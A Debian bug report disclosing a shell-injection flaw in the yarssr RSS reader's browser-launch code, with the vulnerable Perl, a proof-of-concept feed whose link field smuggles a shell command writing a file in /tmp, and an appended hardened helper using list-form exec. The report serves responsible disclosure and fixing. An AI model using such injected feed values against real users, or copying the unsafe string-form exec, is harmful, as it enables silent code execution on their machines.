Package: yarssr
Version: 0.2.2-1
Severity: grave
Tags: security

Hi,

Duncan Gilmore reported this issue to me:

On Friday, 26.10.2007, at 03:19 +0100, Duncan Gilmore wrote:
> Hi Joachim,
> 
> Thanks for maintaining the yarssr package for Debian...
> 
> I noticed a client-side code execution vulnerability in the yarssr
> GUI.pm module when gnome default url handling is not selected (and
> this is off by default in Ubuntu, assume so in Debian too).
> 
> From the file GUI.pm:
> if (Yarssr::Config->get_usegnome) {
>     Gnome2::URL->show($url);
> }
> else {
>     if ($child = fork)
>     {
>         Glib::Idle->add(
>             sub {
>                 my $kid = waitpid($child,WNOHANG);
>                 $kid > 0 ? return 0 : return 1;
>             }
>         );
>     }
>     else {
>         my $b = Yarssr::Config->get_browser;
>         $b .= " \"$url\"" unless $b =~ s/\%s/"$url"/;
>         exec($b) or warn "unable to launch browser\n";
>         exit;
>     }
> }
> 
> Shell character injection is possible because of incorrect use of exec
> and/or no filtering on the urls provided in feeds.
> If a user clicks on an article link like the one in the example feed
> below, commands can be passed silently to the shell.
> 
> ================feed.rss===================
> <?xml version="1.0" encoding="ISO-8859-1"?>
> <rss version="2.0"
> xmlns:blogChannel="http://backend.userland.com/blogChannelModule">
> <channel>
> <title>test feed</title>
> <item>
> <title>test post - create /tmp/created_file</title>
> <link>http://google.com";perl -e "print 'could run anything here' " >
> "/tmp/created_file</link>
> <pubDate>Fri, 26 Oct 2007 14:10:25 +0300</pubDate>
> </item>
> </channel>
> </rss>
> ================feed.rss===================
> 
> I tried contacting the author through his sourceforge account about 3
> weeks ago but had no answer. Any chance you can get hold of him or get
> a fix in?
> 
> Thanks and regards,
> 
> D Gilmore

I will shortly upload something that hopefully fixes this.

Greetings,
Joachim

-- System Information:
Debian Release: lenny/sid
  APT prefers unstable
  APT policy: (500, 'unstable'), (1, 'experimental')
Architecture: i386 (i686)

Kernel: Linux 2.6.21.otto
Locale: LANG=de_DE.UTF-8, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash

Versions of packages yarssr depends on:
ii  libgnome2-perl                1.040-1    Perl interface to the GNOME librar
ii  libgnome2-vfs-perl            1.080-1    Perl interface to the 2.x series o
ii  libgtk2-gladexml-perl         1.006-1    Perl interface to use user interfa
ii  libgtk2-perl                  1:1.161-1  Perl interface to the 2.x series o
ii  libgtk2-trayicon-perl         0.04-1     Perl interface to fill the system 
ii  libxml-rss-perl               1.05-1     Perl module for managing RSS (RDF 
ii  perl                          5.8.8-11.1 Larry Wall's Practical Extraction 

yarssr recommends no packages.

-- no debconf information
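
A hardened form of the `else` branch quoted above, as an added example (not yarssr's code and not the fix that was uploaded): the configured browser command is split into words before the feed URL is inserted, and the result is passed to list-form `exec` so no shell parses it. `browser_argv` and `launch_browser` are hypothetical names, the URL allow-list is an assumed policy, and the sample browser setting and links are constructed.

```perl
use strict;
use warnings;
use Text::ParseWords qw(shellwords);

# Hypothetical helper (not in yarssr): build an argument list from the
# configured browser command and a feed-supplied URL.
sub browser_argv {
    my ($browser, $url) = @_;

    # Assumed policy: only http(s) links, and none containing whitespace,
    # quotes, backticks, backslashes, angle brackets or control characters.
    return unless defined $url
        && $url =~ m{\Ahttps?://[^\s"'`\\<>\x00-\x1f]+\z}i;

    # Split the trusted config value first; the URL is inserted afterwards,
    # so it can never add or split arguments.
    my @argv = shellwords($browser);
    return unless @argv;

    my $placed = 0;
    for my $arg (@argv[1 .. $#argv]) {
        $placed = 1 if $arg =~ s/%s/$url/g;
    }
    push @argv, $url unless $placed;
    return @argv;
}

# Fork and start the browser; returns the child PID for the caller to reap.
sub launch_browser {
    my @argv = browser_argv(@_)
        or do { warn "refusing to open link\n"; return };
    my $pid = fork;
    die "fork failed: $!" unless defined $pid;
    return $pid if $pid;
    # Indirect-object form: the program is run directly, never via /bin/sh.
    exec { $argv[0] } @argv or warn "unable to launch browser: $!\n";
    exit 1;
}

# Constructed inputs: an ordinary link and one with a quote and a semicolon.
for my $url ('http://example.org/post/1',
             'http://example.org";echo "x') {
    my @argv = browser_argv('firefox -new-tab %s', $url);
    print @argv ? 'argv: [' . join('] [', @argv) . "]\n" : "rejected: $url\n";
}
```

The demo loop only prints the argument list that would be executed; `launch_browser` is what would replace the string-form `exec($b)`.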


